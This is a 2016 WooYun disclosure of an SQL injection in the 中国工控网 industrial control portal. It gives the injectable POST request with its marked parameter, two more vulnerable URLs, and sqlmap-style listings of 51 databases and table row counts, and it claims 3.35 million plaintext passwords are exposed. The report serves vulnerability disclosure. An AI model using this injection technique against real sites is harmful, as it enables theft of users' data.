当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0184767

漏洞标题:中国工控网全网某漏洞可影响三百三十五万明文用户数据含密码

相关厂商:中国工控网

漏洞作者: 小菜果子

提交时间:2016-03-15 13:40

修复时间:2016-05-02 18:22

公开时间:2016-05-02 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经确认,细节仅向厂商公开
2016-03-28: 细节向核心白帽子及相关领域专家公开
2016-04-07: 细节向普通白帽子公开
2016-04-17: 细节向实习白帽子公开
2016-05-02: 细节向公众公开

简要描述:

中国工控网好火,这次和前人找的角度不一样,但同样的感觉,求首页,求20rank

详细说明:

POST /customer/advantech/sq11.asp HTTP/1.1
Content-Length: 228
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCCBADTDC=HCILKDPCFHHGOOAMFMDHCEDN
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
psw=1&select=%b0%e5%bf%a8%c0%e0OEM/ODM%b7%fe%ce%f1&tijiao=%cc%e1%bd%bb&usname=aaaa*&xq=1


http://**.**.**.**/customer/advantech/embed.asp?key=SOM


http://**.**.**.**/customer/advantech/download.asp?keyword=%E5%B7%A5%E6%8E%A7%E6%9C%BA


available databases [51]:
[*] ABB
[*] agongkong
[*] ase_050124
[*] caa
[*] cfpmia
[*] cus_2010_for_bb
[*] cus_abb
[*] cus_abb_BC
[*] custom
[*] custom_1
[*] forzdao
[*] GkCrm
[*] gkmall
[*] gknetdatanew
[*] gkoa
[*] gkreguser
[*] gkstat
[*] GkStudy
[*] gkstudynet
[*] gksystem
[*] gongkong
[*] gongkongcorp
[*] GongKongNet
[*] inquire
[*] kpi2012
[*] LouKong
[*] master
[*] model
[*] msdb
[*] NBBS
[*] NDic
[*] NMessage
[*] NReguser
[*] NRegUserDynamic
[*] NSys
[*] NSysLog
[*] nweblog
[*] opc_2009
[*] peCms
[*] Photography
[*] ReportServer
[*] ReportServerTempDB
[*] SchneiderBBS
[*] siemensEl
[*] siemensQuiz
[*] tempdb
[*] wap2011
[*] wapsubscribe
[*] xiugongkong
[*] xuegongkong
[*] youjiang


Database: gongkongnet
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.WVisit                             | 30162070 |
| dbo.RecordIP                           | 17396251 |
| dbo.InfoPublicationLog                 | 15455349 |
| dbo.BaseProductModelParameter          | 9287436 |
| dbo.MPRuleHistory                      | 4584307 |
| dbo.DownloadDetail                     | 3835223 |
| dbo.RegUserView                        | 3353115 |
| dbo._temp_Stock4Custom_all             | 3112420 |
| dbo.ForumReplyUserView                 | 2865331 |
| dbo.BADViewHistory                     | 2697192 |
| dbo.Message                            | 2593563 |
| dbo.CoAdAssoViewHistory                | 2508874 |
| dbo.special_magazine_info_access       | 2180205 |
| dbo.RegUserMemberInfo                  | 2104125 |
| dbo.regusermemberinfoPointValueYearBak | 2089084 |
| dbo.RegUserPointvalue                  | 1780304 |
| dbo.UserHistory                        | 1289783 |
| dbo.CommonAuditTrace                   | 1233675 |
| dbo.MPExchangeDetail                   | 1134628 |
| dbo.SearchKeyWords                     | 1044812 |
| dbo.tb_index                           | 1042079 |
| dbo.MmsOrder                           | 928286  |
| dbo.smsOrder                           | 927693  |
| dbo.V_Product_IndustryTech             | 878915  |
| dbo.ProductIndustry                    | 878635  |
| dbo.RegUserActivation                  | 782068  |
| dbo.BizTrades                          | 741197  |
| dbo.HrPositionCompanyProductView       | 679729  |
| dbo.CompanyAsso                        | 670801  |
| dbo.BizTradeProductTypeBrandView       | 581081  |
| dbo.QuestVote                          | 565218  |
| dbo.temp_index                         | 510302  |
| dbo.ViewForumTopicPink                 | 488790  |
| dbo.ForumTopicsByGategory              | 488768  |
| dbo._temp_ProductModel4Custom_all      | 475602  |
| dbo.v_Forum_List                       | 464263  |
| dbo.CommonFeedback                     | 443200  |
| dbo.BizSaleSelectedModel               | 433615  |
| dbo.ViewBizSaleModel                   | 428988  |
| dbo.IpDataBase                         | 417423  |
| dbo.CommonFeedBackUserView             | 405108  |
| dbo.IpAddress                          | 357178  |
| dbo.TempIndustryProducts               | 347001  |
| dbo.ViewTmpBbs                         | 342218  |
| dbo.ComContMutuality                   | 330367  |
| dbo.OnlineProsemQuestion               | 308889  |
| dbo.HrReceiptResume                    | 265450  |
| dbo.ViewHrPositionResume               | 265450  |
| dbo.ViewHrUserResume                   | 265450  |
| dbo.BaseProductModel                   | 260903  |
| dbo.BaseProductModelView               | 260903  |
| dbo.HomeUserClickRecord                | 253864  |
| dbo.BaseProductModel3                  | 248096  |
| dbo.Photo                              | 244569  |
| dbo.ProductsByIProductTypeViews        | 241597  |
| dbo.BaseIProductTypeProductViews       | 241006  |
| dbo.CompanyProductTypeIdView           | 211556  |
| dbo.ViewNewsSolutionDatumTutorial      | 196842  |
| dbo.RegUserVisitHistory                | 196126  |
| dbo.IndustryChannelIndustryNewsView    | 191583  |
| dbo.TempIndustryCompany                | 190784  |
| dbo._bak4City                          | 182714  |
| dbo.TechArticleIndustry                | 178308  |
| dbo._bak4Category                      | 176725  |
| dbo.ViewTechArticleIndustry            | 176646  |
| dbo.RegUserFavorite                    | 174096  |
| dbo._bak4Intent                        | 163031  |
| dbo.BizSalesProdutType                 | 162029  |
| dbo.ProductProductType                 | 161109  |
| dbo.ProductsByProductTypeView          | 159652  |
| dbo.V_TechArticle_IndustryTech         | 158801  |
| dbo.ViewProductsByMinPcode             | 157910  |
| dbo.ViewProductsByMin                  | 156775  |
| dbo.ViewProductsByMidPcode             | 156452  |
| dbo.V_Product_PRunPType                | 156202  |
| dbo.ViewProductsByMid                  | 155317  |
| dbo.V_BizSales_PRunPType               | 152804  |
| dbo.OnlineLogins                       | 149393  |
| dbo.WInfo                              | 145529  |
| dbo.CommonFeedbackStat                 | 144611  |
| dbo.CompanyProductyType                | 143719  |
| dbo.ViewCompanyIDByMinPcode            | 141632  |
| dbo.ViewCompanysByMinPcode             | 141603  |
| dbo.ViewCompanyIDByMidPcode            | 140665  |
| dbo.ViewCompanysByMidPcode             | 140636  |
| dbo.RegUserFriend                      | 138368  |
| dbo.V_Company_PRunPType                | 137827  |
| dbo.ViewCompanyCtypePtype              | 137777  |
| dbo.NewsProductType                    | 137251  |
| dbo.V_News_PRunPType                   | 136735  |
| dbo.V_News_IndustryTech                | 135954  |
| dbo.NewsIndustry                       | 134103  |
| dbo.ViewHYTJNews                       | 134103  |
| dbo._temp_Price4Custom_all             | 133644  |
| dbo.BaseProductModel2                  | 132815  |
| dbo.SlcStatic                          | 130849  |
| dbo.V_Datum_PRunPType                  | 124490  |
| dbo.DatumProdutType                    | 124300  |
| dbo.DatumProductTypeView               | 124298  |
| dbo.CompanyMenu                        | 123661  |
| dbo.ViewTechnicCommend                 | 120461  |
| dbo.NewsByProductTypeView              | 116402  |
| dbo.ViewNewsByPtype                    | 115990  |
| dbo.ViewNewsIdByPtype                  | 115990  |
| dbo.DatumFreeReguser                   | 111432  |
| dbo.RegUserGroupMember                 | 110873  |
| dbo.researchVisit                      | 108867  |
| dbo.HrUserBase                         | 107650  |
| dbo.ViewHrUserInfo                     | 107650  |
| dbo.V_TechArticle_PRunPType            | 106176  |
| dbo.TechArticleProductType             | 104950  |
| dbo.ViewDatumByPtype                   | 104404  |
| dbo.ViewDatumIdByPtype                 | 104404  |
| dbo.HrUserIntent                       | 103745  |
| dbo.ViewProductByMaxPtype              | 103416  |
| dbo.ViewProductIdByMaxPtype            | 103416  |
| dbo.BizSalesProductTypeView            | 101703  |
| dbo.V_Datum_IndustryTech               | 101558  |
| dbo.ViewProductsByMaxPcode             | 101465  |
| dbo.DatumIndustry                      | 100880  |
| dbo.ViewProductsByMax                  | 100608  |
| dbo.ViewCompanyIDByMaxPcode            | 99994   |
| dbo.ViewCompanysByMaxPcode             | 99979   |
| dbo.RegUserIndustry                    | 96509   |
| dbo.News                               | 93034   |
| dbo.ViewCompanyIdByPtype               | 91908   |
| dbo.ViewCompanyByPtype                 | 91895   |
| dbo.ViewSaleModel                      | 91152   |
| dbo.Product                            | 89566   |
| dbo.ProductProductCustomType           | 88075   |
| dbo.OnlineProsemAnswer                 | 86608   |
| dbo.BizSaleProductTypeView             | 85618   |
| dbo.ForumTopic3                        | 84601   |
| dbo.HrUserWorklive                     | 84540   |
| dbo.ProseminarRecord                   | 84513   |
| dbo.BizSales                           | 84155   |
| dbo.PaperIndustry                      | 83813   |
| dbo.PaperIndustryView                  | 83812   |
| dbo.Datum                              | 83586   |
| dbo.RegUserProductType                 | 82045   |
| dbo.HrEducation                        | 81966   |
| dbo.BlogIndexAction                    | 81697   |
| dbo.testProductView                    | 79542   |
| dbo.BizSaleProductBrandView            | 77788   |
| dbo.BizResortProductType               | 75075   |
| dbo.V_MarketNews_IndustryTech          | 74170   |
| dbo.MarketNewsIndustry                 | 74013   |
| dbo.MarketNewsIndustryView             | 74008   |
| dbo.px_paperIndustry                   | 73520   |
| dbo.ViewHYTJPapar                      | 73520   |
| dbo.HrUserLanguage                     | 72405   |
| dbo.CompanySeller                      | 68872   |
| dbo.ForumTopicsBySortView              | 65898   |
| dbo.ViewHYTJBBS                        | 65842   |
| dbo.WapMobileHistory                   | 64675   |
| dbo.BizResortProductTypeView           | 64416   |
| dbo.HrPositionProductType              | 63260   |
| dbo.TechArticle                        | 62284   |
| dbo.ArticeAssoProductType              | 60433   |
| dbo.ProductIdByBrandView               | 56743   |
| dbo.BizResortStock                     | 56473   |
| dbo.CompanyCompanyType                 | 54386   |
| dbo.CompanyCompanyTypeView             | 54373   |
| dbo.ViewCompanyCompanyType             | 54373   |
| dbo.StatFileLog                        | 52674   |
| dbo.MarketNews                         | 52494   |
| dbo.Company                            | 52433   |
| dbo._bak4work                          | 51607   |
| dbo.SolutionIndustry                   | 50495   |
| dbo.ViewHYTJSolution                   | 50177   |
| dbo.ViewSolutionIndustry               | 50177   |
| dbo.BizOrderDetails                    | 48130   |
| dbo.ViewOrderModel                     | 48130   |
| dbo.BizOrder                           | 48108   |
| dbo.TempConvert                        | 45761   |
| dbo.MediaUserSubscibe                  | 45506   |
| dbo.CompanyIndustry                    | 44062   |
| dbo.QuestUserAnswer                    | 43808   |
| dbo.DatumBrandView                     | 42660   |
| dbo.TempIproductType                   | 41655   |
| dbo.PhotoPhotoContest                  | 40049   |
| dbo.PaperProductType                   | 39379   |
| dbo.ModelParameter                     | 39142   |
| dbo.ChargeInfo                         | 38088   |
| dbo.ProductModel                       | 37800   |
| dbo.PhotoContest                       | 34157   |
| dbo.ArticeAssoIndustry                 | 33757   |
| dbo.SysLog                             | 33752   |
| dbo.InfoCommendStat                    | 33686   |
| dbo.AdvertiseProductType               | 32426   |
| dbo.MPExcuteTemp                       | 30724   |
| dbo.SchneiderUser                      | 30475   |
| dbo.BaseSeriesProductType              | 29418   |
| dbo.model_bak                          | 28206   |
| dbo.ReserReguser                       | 27795   |
| dbo.SolutionProductType                | 27416   |
| dbo.OnlineProseminarVideoPPt           | 27050   |
| dbo.CompanysByAccountTypeView          | 27004   |
| dbo.CommonVote                         | 26978   |
| dbo.CompanyLayout                      | 26476   |
| dbo.HrTrainExp                         | 26226   |
| dbo.PayReadHistory                     | 25225   |
| dbo.Papers                             | 24899   |
| dbo.ViewSolutionIdByPtype              | 24657   |
| dbo.ViewSolutionByPtype                | 24523   |
| dbo.ViewHrPositionCompany              | 24488   |
| dbo.SchneiderUserSolution              | 24486   |
| dbo.BaseParamConst                     | 24331   |
| dbo.RegUserBrand                       | 23126   |
| dbo._bak4PCategory                     | 21600   |
| dbo.CompanyStockServer                 | 20430   |
| dbo._temp_Stock4Custom                 | 20367   |
| dbo.ClumMember                         | 20156   |
| dbo.ViewClubMemberRegUser              | 20154   |
| dbo.ViewClubMemberSelect               | 20154   |
| dbo.OnlineLogout                       | 19917   |
| dbo.Solutions                          | 19078   |
| dbo.HrPosition                         | 18893   |
| dbo.DatumProductSeries                 | 18197   |
| dbo.HrUserBaseBrand                    | 18152   |
| dbo.BookOrderDetails                   | 17964   |
| dbo.NewsProductCustomType              | 17598   |
| dbo.KouBei                             | 17170   |
| dbo.MPShareHistory                     | 17057   |
| dbo.CompanyBrand                       | 16801   |
| dbo.ViewHrPositions                    | 15549   |
| dbo.ProductCustomType                  | 15370   |
| dbo.ExpositionLook                     | 15075   |
| dbo.CompanyBrandView                   | 14692   |
| dbo.BaseProductSeries                  | 14520   |
| dbo.ViewPaperIdByPtype                 | 14355   |
| dbo.ViewPaperByPtype                   | 14328   |
| dbo.papers_importdata                  | 13212   |
| dbo.ExpositionDetails                  | 13165   |
| dbo.BizTradesProductSeries             | 13157   |
| dbo.BookOrder                          | 12935   |
| dbo.InfoProject                        | 12918   |
| dbo.ExpositionDetailsView              | 12620   |
| dbo.PhotoTypeCustomer                  | 12529   |
| dbo.gongkongcompany                    | 12089   |
| dbo.FaultCode                          | 12005   |
| dbo.FaultCode2                         | 12005   |
| dbo.ProseminarProductType              | 11869   |
| dbo.ProseminarProductTypeView          | 11860   |
| dbo.SolutionByIProductTypeView         | 11758   |
| dbo.Repair                             | 11752   |
| dbo.TechArticleProductSeries           | 11658   |
| dbo.ProductMutuality                   | 11328   |
| dbo.ProseminarProductTypeBrandView     | 10932   |
| dbo.GkgcLog                            | 10797   |
| dbo.Test_PhotoPhotoContest             | 10681   |
| dbo.RegUserFriendType                  | 10674   |
| dbo.BaseBrandProductTypeGK             | 10619   |
| dbo.InquireRecordUsers                 | 10537   |
| dbo.HrUserBaseAssoCompany              | 10361   |
| dbo.QuestOption                        | 10259   |
| dbo.ViewHrUserInfoDown                 | 10144   |
| dbo.TempIndustrySolutions              | 9218    |
| dbo.BizResortStockProductSeries        | 9051    |
| dbo.BaseParameterType                  | 8710    |
| dbo.BaseParameter                      | 8160    |
| dbo.webLink                            | 7970    |
| dbo.ProjectDocument                    | 7937    |
| dbo.ProductModelParameter              | 7346    |
| dbo.ArticleIndustry                    | 6589    |
| dbo.ActUser                            | 6585    |
| dbo.BPrivilegeBControl                 | 6522    |
| dbo.ViewCompanyMemberType              | 6511    |
| dbo.ActUserRole                        | 6447    |
| dbo.ViewMemberCompany                  | 6253    |
| dbo.ArticeAssoBrand                    | 5981    |
| dbo.ViewCompanysAssoUser               | 5860    |
| dbo.ViewCompnayIDAssoUser              | 5860    |
| dbo.BControl                           | 5730    |
| dbo.IndustryChannelMKResearchView      | 5262    |
| dbo.ResearchIndustry                   | 5118    |
| dbo.Proseminar                         | 5117    |
| dbo.CommonChannelCommend               | 5084    |
| dbo.MPExchange                         | 5078    |
| dbo.BPrivilegeBPage                    | 5065    |
| dbo.ReportError                        | 5059    |
| dbo.ViewCompanyMember                  | 5058    |
| dbo.CommunityVisit                     | 5045    |
| dbo.xp_user                            | 4987    |
| dbo.ResearchNewsIndexAction            | 4976    |
| dbo.CommendProductPtypeView            | 4741    |
| dbo.TutorialIndustry                   | 4659    |
| dbo.NewsProductSeries                  | 4542    |
| dbo.HrProjectExp                       | 4376    |
| dbo.BTag                               | 4373    |
| dbo.ArticleProductType                 | 4283    |
| dbo.DatumDatumCustomerType             | 4185    |
| dbo.HrUserIndexAction                  | 4076    |
| dbo.MpHistoryMpExchange                | 4054    |
| dbo.HrSpecialSkill                     | 3968    |
| dbo.DerlingCeaiHistory                 | 3926    |
| dbo.BaseParameterTmp                   | 3870    |
| dbo.MediaUserContribute                | 3839    |
| dbo.BADVisitHistory                    | 3771    |
| dbo.ParameterOption                    | 3599    |
| dbo.BRoleBPrivilege                    | 3568    |
| dbo.yeneihezuo_user                    | 3450    |
| dbo.BPrivilege                         | 3367    |
| dbo.MyCardCase                         | 3344    |
| dbo.TutorialDetails                    | 3339    |
| dbo.RegUserIntel                       | 3199    |
| dbo.OAFeedback                         | 3164    |
| dbo.CommendProductPcode                | 3157    |
| dbo.BrandAssoProduct                   | 3120    |
| dbo.Advertise                          | 3110    |
| dbo.InfoPublication                    | 3104    |
| dbo.BaseBrandProductTypeXiu2           | 3062    |
| dbo.Question                           | 2913    |
| dbo.english_news                       | 2901    |
| dbo.HrUserResumeAccessory              | 2864    |
| dbo.VideoTypeCustomer                  | 2738    |
| dbo.lunwen_user                        | 2682    |
| dbo.BaseBrandProductType               | 2679    |
| dbo.TechArticleProductionRun           | 2656    |
| dbo.ViewHwwzIndustry                   | 2643    |
| dbo.View_HwwzBaseIndustry              | 2617    |
| dbo.HrCompanyFavorite                  | 2514    |
| dbo.exam_user                          | 2498    |
| dbo.BaseBrandProductTypeView           | 2409    |
| dbo.CommendProductView                 | 2357    |
| dbo.CompanyStockServerSub              | 2349    |
| dbo.videoCode                          | 2314    |
| dbo.OnlineSurveryHistory               | 2313    |
| dbo.news_user                          | 2287    |
| dbo.BaseBrandProductTypeXiu            | 2238    |
| dbo.UserContributions                  | 2222    |
| dbo.SendMMsHistory                     | 2154    |
| dbo.Article                            | 2148    |
| dbo.OnlineProsemUser                   | 2130    |
| dbo.AdSubjectContent                   | 2123    |
| dbo.MediaPaper                         | 2102    |
| dbo.TutorialProductType                | 2023    |
| dbo.ContentScoreDetails                | 2021    |
| dbo.MpCashExchange                     | 1989    |
| dbo.NewsTechType                       | 1977    |
| dbo.bz_user                            | 1972    |
| dbo.BPage                              | 1964    |
| dbo.ActUserHr                          | 1943    |
| dbo.HrManageExp                        | 1892    |
| dbo.CustomServicers                    | 1886    |
| dbo.CustomServicersView                | 1886    |
| dbo.BookHistory                        | 1861    |
| dbo.AdvertiseSiteColumnPageArea        | 1829    |
| dbo.BaseBrand                          | 1817    |
| dbo.CoAdAssoHitHistory                 | 1811    |
| dbo.CommonAccessTrace                  | 1790    |
| dbo.ActPermissionResource              | 1765    |
| dbo.V_MarketNews_PRunPType             | 1757    |
| dbo.jszc_user                          | 1746    |
| dbo.BizCooperateProductType            | 1729    |
| dbo.BizCooperateProductTypeBrandView   | 1729    |
| dbo.KeyWordFilter                      | 1710    |
| dbo.OAMessage                          | 1675    |
| dbo.ProductProductionRun               | 1671    |
| dbo.CompanyEmployees                   | 1608    |
| dbo.pxblog_user                        | 1607    |
| dbo.BizMro                             | 1576    |
| dbo.WapMobibleUserInfo                 | 1562    |
| dbo.BookInAndOut                       | 1548    |
| dbo.InfoMemberAttemp                   | 1533    |
| dbo.OAGiftHistory                      | 1510    |
| dbo.ViewAdRoleCompanys                 | 1495    |
| dbo.ResearchProductType                | 1487    |
| dbo.RepairAccessory                    | 1401    |
| dbo.BaseExcel                          | 1366    |
| dbo.Books                              | 1336    |
| dbo.DatumProductionRun                 | 1328    |
| dbo.MarketNewsProductType              | 1322    |
| dbo.MarketNewsProductTypeViews         | 1322    |
| dbo.Exposition                         | 1284    |
| dbo.newuserEnglish                     | 1201    |
| dbo.SolicitarticleFeedback             | 1189    |
| dbo.TutorialDir                        | 1144    |
| dbo.HRSurvey                           | 1059    |
| dbo.solutionProductCustomType          | 1041    |
| dbo.OnlineProsemSurvey                 | 1035    |
| dbo.VideoVideoType                     | 1008    |
| dbo.Video                              | 1000    |
| dbo.BaseIProductTypeAssc               | 988     |
| dbo.BaseIProductTypeViews              | 988     |
| dbo.OnlineProsemIndustry               | 945     |
| dbo.BookGathering                      | 941     |
| dbo.VideoFeedback                      | 912     |
| dbo.MediaNews                          | 900     |
| dbo.EquipmentPurchase                  | 885     |
| dbo.CompanyContact                     | 883     |
| dbo.CompanyFocus                       | 874     |
| dbo.Attestation                        | 867     |
| dbo.datumimportdata                    | 841     |
| dbo.ExcelUploadFiles                   | 838     |
| dbo.BaseProductType                    | 835     |
| dbo.ViewProductType                    | 835     |
| dbo.BookProductType                    | 825     |
| dbo.ViewAdCompanys                     | 823     |
| dbo.VideoIndustry                      | 795     |
| dbo.ViewXlsCompanySaleModel            | 792     |
| dbo.CompanyMember                      | 780     |
| dbo.MediaCatalog                       | 768     |
| dbo.TechArticleTechType                | 765     |
| dbo.FactoryCompanyIndustry             | 733     |
| dbo.IRegUserConfig                     | 717     |
| dbo.AskerOline                         | 702     |
| dbo.OnlineProsemProductType            | 686     |
| dbo.BaseProductType_Temp               | 681     |
| dbo.CompanyCommend                     | 678     |
| dbo.DatumTechType                      | 678     |
| dbo.RegUserAccountInfo                 | 651     |
| dbo.CompanyPartSettings                | 650     |
| dbo.ViewResearchNewsRpt                | 633     |
| dbo.BizCooperate                       | 632     |
| dbo.ForumPurviewView                   | 631     |
| dbo.MemberPurview                      | 631     |
| dbo.GKCreditApp                        | 629     |
| dbo.ResearchReport                     | 621     |
| dbo.px_2008_list                       | 583     |
| dbo.Questionnaire                      | 578     |
| dbo.NewsProductionRun                  | 572     |
| dbo.VideoProductType                   | 570     |
| dbo.AdvBooking                         | 531     |
| dbo.ForumGategory_Temp                 | 531     |
| dbo.CompanyBanner                      | 530     |
| dbo.ProductDocumentProductType         | 530     |
| dbo.ProjectDocumentProductType         | 528     |
| dbo.ActControlResource                 | 514     |
| dbo.RegUserExtend                      | 501     |
| dbo.ElementDynamic                     | 500     |
| dbo.BaseProductType_Bak                | 498     |
| dbo.datumTypeCustomer                  | 494     |
| dbo.SolicitArticlesProductType         | 488     |
| dbo.OnlineProseminar                   | 486     |
| dbo.Cases                              | 483     |
| dbo.OnlineProsemCompany                | 483     |
| dbo.InfoCommend                        | 477     |
| dbo.MarketNewsProductionRun            | 472     |
| dbo.CompanyLink                        | 458     |
| dbo.ExpositionCompany                  | 450     |
| dbo.BMenu                              | 447     |
| dbo.BPrivilegeBMenu                    | 447     |
| dbo.BaseBrandProductTypeXiu1           | 436     |
| dbo.IRegUserMessage                    | 436     |
| dbo.exam_list                          | 431     |
| dbo.OnlineProseminarMPHistory          | 431     |
| dbo.BaseArea                           | 429     |
| dbo.PhotoWinPrize                      | 424     |
| dbo.lunwen_list                        | 420     |
| dbo.AdvertiseApply                     | 405     |
| dbo.BaseProductTypeXiu                 | 381     |
| dbo.TempIproductTypePtype              | 378     |
| dbo.MemberAdmin                        | 376     |
| dbo.FactoryCompany                     | 359     |
| dbo.ProductAheadNote                   | 359     |
| dbo.HrInterviewingInform               | 349     |
| dbo.MPRuleHistoryTemp                  | 341     |
| dbo.CompanyProductionRun               | 335     |
| dbo.RegUserCommunityInfo               | 332     |
| dbo.ViewHwwzPcode                      | 323     |
| dbo.HrManagerNewsFeedback              | 321     |
| dbo.CommunityUser                      | 309     |
| dbo.Product_Del                        | 300     |
| dbo.GongkongMP10                       | 296     |
| dbo.news_en                            | 286     |
| dbo.ProductDocument                    | 284     |
| dbo.BaseIndustry                       | 280     |
| dbo.ProductTechType                    | 280     |
| dbo.ActUserExpo                        | 276     |
| dbo.RegUserAppCom                      | 262     |
| dbo.BAreaAdvertiseAsso                 | 252     |
| dbo.HrNews                             | 252     |
| dbo.AbroadArticleView                  | 248     |
| dbo.SendHistory                        | 248     |
| dbo.FactoryCompanyType                 | 247     |
| dbo.CompanySpecial                     | 238     |
| dbo.MPRule                             | 238     |
| dbo.ProseminarTechType                 | 238     |
| dbo.HrSubscibe                         | 236     |
| dbo.ExpositionJoin                     | 234     |
| dbo.GongKongNewsView                   | 232     |
| dbo.ActUserBRole                       | 227     |
| dbo.OAGiftPicture                      | 216     |
| dbo.english_weekly                     | 215     |
| dbo.BookAmount                         | 213     |
| dbo.CompanyCustomize                   | 213     |
| dbo.SolicitarticleComeView             | 210     |
| dbo.SolicitArticles                    | 210     |
| dbo.MarketNewsTechType                 | 204     |
| dbo.OAGift                             | 187     |
| dbo.HrHunterPositionView               | 181     |
| dbo.NewsAssoSocial                     | 181     |
| dbo.BizSalesProductionRun              | 174     |
| dbo.ClubPayment                        | 174     |
| dbo.IRegUserFavorite                   | 174     |
| dbo.ViewClubPaymentUser                | 174     |
| dbo.BaseProductTypeProductTypeXiu      | 172     |
| dbo.BaseIProductType                   | 156     |
| dbo.FactoryCompanyProductyType         | 156     |
| dbo.xp_list                            | 156     |
| dbo.DerlingCeai                        | 143     |
| dbo.CoSiteCoHotMessage                 | 140     |
| dbo.BAdvertise                         | 134     |
| dbo.ResearchNews                       | 132     |
| dbo.CoAdAsso                           | 130     |
| dbo.BookOosNote                        | 125     |
| dbo.CommonSubject                      | 125     |
| dbo.MmsMessage                         | 119     |
| dbo.RegUserGroup                       | 118     |
| dbo.BArea                              | 116     |
| dbo.FaultCodeBack                      | 115     |
| dbo.CasesIndustry                      | 114     |
| dbo.CompanyPublication                 | 109     |
| dbo.jszc_list                          | 106     |
| dbo.WapMobileCompany                   | 105     |
| dbo.yanjiu                             | 103     |
| dbo.HrUserAssoActivity                 | 102     |
| dbo.ResearchMessage                    | 100     |
| dbo.ViewOnlieProsemCompany             | 98      |
| dbo.hrManagerNews                      | 94      |
| dbo.PayOrder                           | 90      |
| dbo.BColumnMPRule                      | 89      |
| dbo.WComment                           | 89      |
| dbo.BEmployee                          | 87      |
| dbo.BaseCompanyTypeUserJob             | 86      |
| dbo.InfoProjectIndustry                | 86      |
| dbo.MediaBase                          | 83      |
| dbo.InteractiveCommendView             | 82      |
| dbo.ResearchVisitUser                  | 82      |
| dbo.ActUserMedia                       | 81      |
| dbo.ActRole                            | 78      |
| dbo.NewsHr                             | 76      |
| dbo.HrPositionType                     | 75      |
| dbo.OAServiceHistory                   | 74      |
| dbo.MpGiftHistory                      | 73      |
| dbo.ViewDynamicResearch                | 72      |
| dbo.DatumFreeReguserHistory            | 71      |
| dbo.News_Del                           | 71      |
| dbo.MRReportTypeMRCustomer             | 70      |
| dbo.SolutionTechType                   | 70      |
| dbo.ClubMessage                        | 68      |
| dbo.OnlineSurveryItem                  | 67      |
| dbo.ClubMessageTypeView                | 66      |
| dbo.HRBranches                         | 66      |
| dbo.MediaUserAdRequest                 | 64      |
| dbo.tempTopic                          | 63      |
| dbo.SendMsgTable                       | 60      |
| dbo.QuestionnairesBody                 | 59      |
| dbo.QuestionnairesHead                 | 59      |
| dbo.CompetencyBrand                    | 55      |
| dbo.PaperTechType                      | 55      |
| dbo.ViewCompanyCompetencyBrand         | 55      |
| dbo.RegUserGroupIndustry               | 52      |
| dbo.CommunityMessage                   | 51      |
| dbo.ProductProductParameter            | 51      |
| dbo.Community                          | 50      |
| dbo.onlineQTemp                        | 49      |
| dbo.BizCooperateIndustry               | 48      |
| dbo.ChannelsServer                     | 48      |
| dbo.CustomServicer                     | 48      |
| dbo.ErrorTable                         | 48      |
| dbo.IRegUserMessageFeedBack            | 46      |
| dbo.MPProject                          | 46      |
| dbo.ViewRoleResource                   | 46      |
| dbo.CompanyLinkman                     | 45      |
| dbo.CommonSubjectPrd                   | 44      |
| dbo.dst2q                              | 44      |
| dbo.bz_list                            | 42      |
| dbo.NonRegUser                         | 42      |
| dbo.IMessageConfig                     | 41      |
| dbo.yeneihezuo_en                      | 41      |
| dbo.CoSite                             | 40      |
| dbo.ProseminarLogins                   | 40      |
| dbo.SubMpScoreTable                    | 40      |
| dbo.InfoProjectProductType             | 39      |
| dbo.OpSqlNote                          | 38      |
| dbo.StockCompany                       | 38      |
| dbo.Lecturer                           | 37      |
| dbo.OAMessageType                      | 37      |
| dbo.DatumProdutType_Del                | 36      |
| dbo.BaseEmail                          | 34      |
| dbo.RegUserGroupProductType            | 32      |
| dbo.BaseTechType                       | 30      |
| dbo.TVFeedback                         | 30      |
| dbo.UserJoinTag                        | 29      |
| dbo.CompanyComHit                      | 28      |
| dbo.HrProductType                      | 27      |
| dbo.ProseminarOline                    | 27      |
| dbo.UserHelp                           | 27      |
| dbo.MRReport                           | 26      |
| dbo.ProseminaryNewsAsso                | 26      |
| dbo.HistoryElement                     | 25      |
| dbo.InfoProjectBrand                   | 25      |
| dbo.InfoProjectReply                   | 25      |
| dbo.OnlineSurvery                      | 25      |
| dbo.BaseUserJob                        | 24      |
| dbo.BQuickLink                         | 24      |
| dbo.BModule                            | 23      |
| dbo.ElementOperation                   | 23      |
| dbo.BRole                              | 21      |
| dbo.HrPositionIndexAction              | 21      |
| dbo.OAService                          | 21      |
| dbo.CardCase                           | 20      |
| dbo.IndexLog                           | 20      |
| dbo.news_list                          | 20      |
| dbo.OAMessageIndexAction               | 20      |
| dbo.ExpositionIntroType                | 19      |
| dbo.HRReportStat                       | 19      |
| dbo.CoHotMessage                       | 18      |
| dbo.CompanyOnlineContact               | 18      |
| dbo.HRSurveyCompany                    | 18      |
| dbo.PlatQuestion                       | 18      |
| dbo.BaseProductionRun                  | 17      |
| dbo.TechArticleType                    | 17      |
| dbo.BColumn                            | 16      |
| dbo.PhotoWinPrizeResult                | 16      |
| dbo.ProjectDocumentIndustry            | 16      |
| dbo.BPrivilegeBProject                 | 15      |
| dbo.IRegUserOnline                     | 15      |
| dbo.newsType                           | 15      |
| dbo.prosemtmp                          | 15      |
| dbo.BProject                           | 14      |
| dbo.AdReservation                      | 13      |
| dbo.BaseProductTypeParameter           | 13      |
| dbo.IConfig                            | 13      |
| dbo.IMessage                           | 13      |
| dbo.QuestionnaireIndexAction           | 13      |
| dbo.BizCooperateProductSeries          | 12      |
| dbo.Bookconcern                        | 12      |
| dbo.BaseCompanyType                    | 11      |
| dbo.CompanyCompanySection              | 11      |
| dbo.CompanyHrColumn                    | 11      |
| dbo.WuliuProductModel                  | 11      |
| dbo.ActPermission                      | 10      |
| dbo.BDepartment                        | 10      |
